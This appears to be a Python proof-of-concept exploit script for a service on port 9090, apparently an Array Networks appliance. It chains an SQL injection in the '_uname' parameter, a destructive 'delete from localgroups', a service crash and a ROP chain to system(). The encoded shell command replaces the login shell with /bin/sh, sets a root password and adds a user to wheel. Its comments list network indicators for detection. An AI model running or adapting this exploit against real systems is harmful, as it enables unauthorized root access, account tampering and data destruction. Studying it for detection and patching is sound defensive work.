import argparse
import traceback

from pwn import *  # provides remote() and sleep() used in POC._rock
import requests
from requests.packages import urllib3
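# Silence the InsecureRequestWarning that requests/urllib3 would print for
# every verify=False call below; every URL built in this file is plain
# http:// anyway, so TLS verification never applies.
urllib3.disable_warnings()

parser = argparse.ArgumentParser()
# Bare host or IP only: the code prepends "http://" and appends ":9090"
# itself and also hands the value to pwntools' remote() as a host, so a
# value containing a scheme or port would produce a broken URL.  The old
# help text said "target url", which invited exactly that mistake.
parser.add_argument('-ip', help='target host or IP address (no scheme, no port; TCP 9090 is hard-coded)')
args = parser.parse_args()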
class POC:
    """Exploit chain against a service listening on TCP 9090 of ``ip``.

    Flow (see ``_rock``): a SQL injection through the ``_uname`` parameter of
    ``/query/clientverification2`` is used to wipe and repopulate the target's
    ``localgroups`` table with attacker-chosen ``group_id`` values; the service
    is then knocked over via a POST to ``/query/hosts`` and, after a 5 s wait,
    a raw request naming those groups in ``_role`` is sent.  Presumably the
    server copies the resolved ``group_id`` values contiguously into a
    fixed-size buffer, so the ids become a ROP chain ending in ``system()``;
    that is inferred from the constants in ``_rock`` (a ``pop rdi; ret``
    gadget, a ``system`` address, a stack-looking address) -- confirm against
    the target binary.

    Network indicators for detection:
      * GET ``/query/clientverification2`` with ``_uname=array'));`` followed
        by SQL using ``/**/`` for spaces and ending in ``;/**/--``;
      * POST ``/query/hosts`` with an ``application/xml`` body holding a
        ``<GroupNotification>`` element;
      * GET ``/query/hosts`` with ``_pid=admin`` and a very long ``_role``
        value of colon-separated two-character names.

    WARNING: ``_rock`` runs ``delete from localgroups`` on the target, which
    is destructive, and ``_add_sql`` calls ``exit(0)`` on the first unexpected
    response, terminating the whole process.
    """
    def __init__(self, ip: str) -> None:
        # Bare host or IP.  ``_add_sql``/``_rock`` prepend "http://" and
        # append ":9090" themselves, and ``remote()`` gets it as a host.
        self.ip = ip
    def generate_groupnames(self) -> list[str]:
        """Return the first 1034 two-character names over [a-z0-9], in order.

        These rows act as padding: ``_rock`` inserts each one with a
        sequential ``group_id`` and lists them in ``_role`` ahead of the
        ROP-chain entries.  The loop always returns from inside because
        36 * 36 = 1296 > 1034, so the implicit ``None`` fall-through is
        unreachable with these constants.
        """
        _groupnames = []
        basic_chs = "abcdefghijklmnopqrstuvwxyz0123456789"
        _tmp = 0  # number of names emitted so far
        for x in basic_chs:
            for y in basic_chs:
                if _tmp >= 1034:
                    return _groupnames
                _tmp_str = x + y
                _groupnames.append(_tmp_str)
                _tmp += 1
    def _add_sql(self, payload: str) -> None:
        """Execute one SQL statement on the target through the ``_uname`` injection.

        The statement is spliced in after ``array'));`` and terminated with
        ``;/**/--``.  A reply that does not contain ``<Rules>`` is treated as
        failure: the payload is printed and the *whole process* exits with
        status 0 (so a caller never sees a partial run as an error).
        Connection errors and the 5 s timeout propagate as exceptions.

        Args:
            payload: SQL text with ``/**/`` in place of spaces.
        """
        URL = "http://" + self.ip + ":9090/query/clientverification2?_uname=array'));" + payload + ";/**/--"
        HEADERS = {"Connection": "close"}
        # verify=False is a no-op for a plain http:// URL.
        res = requests.get(URL, headers=HEADERS, verify=False, timeout=5)
        if "<Rules>" not in res.text:
            print(payload)
            exit(0)
    def _crash_server(self) -> None:
        """POST a minimal ``<GroupNotification>`` XML body to ``/query/hosts``.

        Named for its effect on the target; presumably the service crashes
        and restarts so that it re-reads ``localgroups`` (inferred from the
        name and from the 5 s ``sleep`` that follows in ``_rock`` -- confirm).
        Every exception, including the expected connection reset or timeout,
        is swallowed, so this never reports whether it worked.
        """
        try:
            URL = "http://" + self.ip + ":9090/query/hosts"
            HEADERS = {"Content-Type": "application/xml"}
            DATA = "<xml>\r\n <GroupNotification Op=\"0\" MasterID=\"1\" PeerID=\"2\" GID=\"3\">\r\n </GroupNotification>\r\n</xml>"
            requests.post(URL, headers=HEADERS, data=DATA, verify=False, timeout=5)
        except:
            pass
    def _rock(self) -> None:
        """Run the whole chain: seed ``localgroups``, crash the service, trigger.

        In the order the code performs it:
          1. Build 1034 padding rows (two-char names, sequential ids).
          2. ``delete from localgroups`` on the target -- destructive.  A
             missing ``<Rules>`` in the reply exits the process silently.
          3. Insert the padding rows, then the ROP/command rows, one HTTP
             request each (``_add_sql`` exits on the first failure).
          4. ``_crash_server`` and sleep 5 s (``sleep`` comes from ``pwn``).
          5. Send one raw HTTP/1.1 request to port 9090 whose ``_role`` lists
             the group names in chain order, and print the raw reply.  Any
             exception in this last step is swallowed.

        Chain layout, read from the ``_role`` string below: two 32-bit ids
        per 64-bit word, low dword first.  ``gad:zer`` = 0x44f6ce (pop rdi;
        ret), ``ca1:ca2`` = 0x00007fffffffe6e0 (the rdi argument; presumably
        where the command bytes that follow land, i.e. no ASLR is assumed),
        ``sys:zer`` = 0x44d21c (system).  Everything after that is the
        command string, 4 ASCII bytes per id.
        """
        group_names = self.generate_groupnames()
        sql_payloads = []
        _id = 1
        for gpname in group_names:
            _tmp_id = _id
            # A few ids are swapped for other values.  Presumably 0x403,
            # 0x404, 0x407, 0x408 and 8 are unusable on the target (already
            # taken or special-cased) -- not visible here, confirm.  Note the
            # 0x408 slot ends up using 1031 (= 0x407), whose own slot moved.
            if _tmp_id == 0x403:
                _tmp_id = 24095752
            elif _tmp_id == 0x404:
                _tmp_id = 8
            elif _tmp_id == 0x408:
                _tmp_id = 1031
            elif _tmp_id == 0x407:
                _tmp_id = 123457
            elif _tmp_id == 8:
                _tmp_id = 123456
            _payload = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (str(_tmp_id), gpname)
            sql_payloads.append(_payload)
            _id += 1
        # Wipe the table first so only attacker rows remain.  Destructive.
        delete_payload = "delete/**/from/**/localgroups"
        URL = "http://" + self.ip + ":9090/query/clientverification2?_uname=array'));" + delete_payload + ";/**/--"
        HEADERS = {"Connection": "close"}
        res = requests.get(URL, headers=HEADERS, verify=False, timeout=5)
        if "<Rules>" not in res.text:
            exit(0)
        # 1034 requests, one per padding row.
        for p in sql_payloads:
            self._add_sql(p)
        # ROP constants (32-bit halves; see the class docstring for pairing).
        pop_rdi_ret = 0x0044f6ce
        system_address = 0x0044D21C
        command_address1 = 0xffffe6e0
        command_address2 = 0x00007fff
        # Command string, 4 ASCII bytes per constant, little-endian
        # (e.g. command_p1 = 0x2f207063 is b"cp /").  Concatenated in
        # ``_role`` order they decode to roughly:
        #   pw usermod array -G wheel;ls -l;rm /ca/bin/ca_shell;
        #   cp /ca/bin/ca_shell /ca/bin/ca_shell.bak;cp /bin/sh /ca/bin/ca_shell;
        #   echo <password> | pw usermod root -h 0;
        # i.e. it replaces /ca/bin/ca_shell with /bin/sh (keeping a .bak
        # copy), pipes a hard-coded password into ``pw usermod root``, and
        # adds user ``array`` to ``wheel`` -- all useful IR indicators.
        # command_p14..command_p17 duplicate command_p6..command_p9 and
        # command_part2_2..command_part2_4 duplicate command_p2..command_p4;
        # none of those duplicates is inserted, ``_role`` reuses cm6..cm9
        # and cm2..cm4 instead.
        command_p27 = 0x3b3020
        command_p26 = 0x682d2074
        command_p25 = 0x6f6f7220
        command_p24 = 0x646f6d72
        command_p23 = 0x65737520
        command_p22 = 0x7770207c
        command_p21 = 0x20333231
        command_p20 = 0x656d6b63
        command_p19 = 0x3066206f
        command_p18 = 0x6863653b
        command_p17 = 0x6c6c6568
        command_p16 = 0x735f6163
        command_p15 = 0x2f6e6962
        command_p14 = 0x2f61632f
        command_p13 = 0x2068732f
        command_p12 = 0x6e69622f
        command_p11 = 0x2070633b
        command_p10 = 0x6b61622e
        command_p9 = 0x6c6c6568
        command_p8 = 0x735f6163
        command_p7 = 0x2f6e6962
        command_p6 = 0x2f61632f
        command_p5 = 0x206c6c65
        command_p4 = 0x68735f61
        command_p3 = 0x632f6e69
        command_p2 = 0x622f6163
        command_p1 = 0x2f207063
        command_part2_5 = 0x3b6c6c65
        command_part2_4 = 0x68735f61
        command_part2_3 = 0x632f6e69
        command_part2_2 = 0x622f6163
        command_part2_1 = 0x2f206d72
        command_part3_8 = 0x3b6c2d20
        command_part3_7 = 0x736c3b6c
        command_part3_6 = 0x65656877
        command_part3_5 = 0x20472d20
        command_part3_4 = 0x79617272
        command_part3_3 = 0x6120646f
        command_part3_2 = 0x6d726573
        command_part3_1 = 0x75207770
        # One row per chain entry; the groupname is the token later used in
        # ``_role`` and the group_id carries the actual 32-bit value.
        gadget_sql_payload = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (pop_rdi_ret, "gad")
        system_sql_payload2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (system_address, "sys")
        command_addr_sql_payload1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_address1, "ca1")
        command_addr_sql_payload2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_address2, "ca2")
        zero_sql_payload = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % ("0", "zer")
        command_sql_payload1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p1, "cm1")
        command_sql_payload2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p2, "cm2")
        command_sql_payload3 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p3, "cm3")
        command_sql_payload4 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p4, "cm4")
        command_sql_payload5 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p5, "cm5")
        command_sql_payload6 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p6, "cm6")
        command_sql_payload7 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p7, "cm7")
        command_sql_payload8 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p8, "cm8")
        command_sql_payload9 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p9, "cm9")
        command_sql_payload10 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p10, "cm10")
        command_sql_payload11 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p11, "cm11")
        command_sql_payload12 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p12, "cm12")
        command_sql_payload13 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p13, "cm13")
        command_sql_payload18 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p18, "cm18")
        command_sql_payload19 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p19, "cm19")
        command_sql_payload20 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p20, "cm20")
        command_sql_payload21 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p21, "cm21")
        command_sql_payload22 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p22, "cm22")
        command_sql_payload23 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p23, "cm23")
        command_sql_payload24 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p24, "cm24")
        command_sql_payload25 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p25, "cm25")
        command_sql_payload26 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p26, "cm26")
        command_sql_payload27 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p27, "cm27")
        command_sql_payload_part2_1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part2_1, "cmp21")
        command_sql_payload_part2_5 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part2_5, "cmp25")
        command_sql_payload_part3_1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_1, "cmp31")
        command_sql_payload_part3_2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_2, "cmp32")
        command_sql_payload_part3_3 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_3, "cmp33")
        command_sql_payload_part3_4 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_4, "cmp34")
        command_sql_payload_part3_5 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_5, "cmp35")
        command_sql_payload_part3_6 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_6, "cmp36")
        command_sql_payload_part3_7 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_7, "cmp37")
        command_sql_payload_part3_8 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_8, "cmp38")
        # 38 more requests.  Insertion order does not matter for the chain;
        # only the ``_role`` order below does.
        self._add_sql(gadget_sql_payload)
        self._add_sql(system_sql_payload2)
        self._add_sql(command_addr_sql_payload1)
        self._add_sql(command_addr_sql_payload2)
        self._add_sql(zero_sql_payload)
        self._add_sql(command_sql_payload1)
        self._add_sql(command_sql_payload2)
        self._add_sql(command_sql_payload3)
        self._add_sql(command_sql_payload4)
        self._add_sql(command_sql_payload5)
        self._add_sql(command_sql_payload6)
        self._add_sql(command_sql_payload7)
        self._add_sql(command_sql_payload8)
        self._add_sql(command_sql_payload9)
        self._add_sql(command_sql_payload10)
        self._add_sql(command_sql_payload11)
        self._add_sql(command_sql_payload12)
        self._add_sql(command_sql_payload13)
        self._add_sql(command_sql_payload18)
        self._add_sql(command_sql_payload19)
        self._add_sql(command_sql_payload20)
        self._add_sql(command_sql_payload21)
        self._add_sql(command_sql_payload22)
        self._add_sql(command_sql_payload23)
        self._add_sql(command_sql_payload24)
        self._add_sql(command_sql_payload25)
        self._add_sql(command_sql_payload26)
        self._add_sql(command_sql_payload27)
        self._add_sql(command_sql_payload_part2_1)
        self._add_sql(command_sql_payload_part2_5)
        self._add_sql(command_sql_payload_part3_1)
        self._add_sql(command_sql_payload_part3_2)
        self._add_sql(command_sql_payload_part3_3)
        self._add_sql(command_sql_payload_part3_4)
        self._add_sql(command_sql_payload_part3_5)
        self._add_sql(command_sql_payload_part3_6)
        self._add_sql(command_sql_payload_part3_7)
        self._add_sql(command_sql_payload_part3_8)
        # Knock the service over and give it time to come back with the new
        # table contents (the wait is a fixed 5 s, not a readiness check).
        self._crash_server()
        sleep(5)
        try:
            # ``_role`` = 1034 padding names, then the chain in the order
            # described in the docstring.  Built with repeated ``+=``; fine
            # for a one-off string of this size.
            _role = ""
            for _gp in group_names:
                _role += _gp
                _role += ":"
            _role += "gad:zer:ca1:ca2:sys:zer:cmp31:cmp32:cmp33:cmp34:cmp35:cmp36:cmp37:cmp38:cmp21:cm2:cm3:cm4:cmp25:cm1:cm2:cm3:cm4:cm5:cm6:cm7:cm8:cm9:cm10:cm11:cm12:cm13:cm6:cm7:cm8:cm9:cm18:cm19:cm20:cm21:cm22:cm23:cm24:cm25:cm26:cm27"
            # Raw socket rather than requests: the request line is sent
            # verbatim (no URL-encoding of ``_role``) with Host: 127.0.0.1.
            t_payload = "GET /query/hosts?_uname=array&_pid=admin&_role=" + _role + " HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"
            p = remote(self.ip, 9090)
            p.send(t_payload)
            # Single recv(): prints whatever the first read returns, which
            # may be a partial reply or nothing useful if the process died.
            print(p.recv())
            p.close()
        except:
            # Any failure of the trigger step is hidden from the caller.
            pass
    def start(self) -> None:
        """Entry point used by ``__main__``; runs ``_rock`` once."""
        self._rock()
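if __name__ == "__main__":
    # Script entry point: -ip is required in practice; without it the old
    # code exited silently with status 0, which looked like a successful run.
    if args.ip:
        try:
            poc = POC(args.ip)
            poc.start()
        except Exception:
            # Top-level boundary: report the full traceback rather than just
            # str(e) -- nearly every failure here is a network error whose
            # origin (which request, which helper) is what the user needs.
            traceback.print_exc()
    else:
        parser.print_usage()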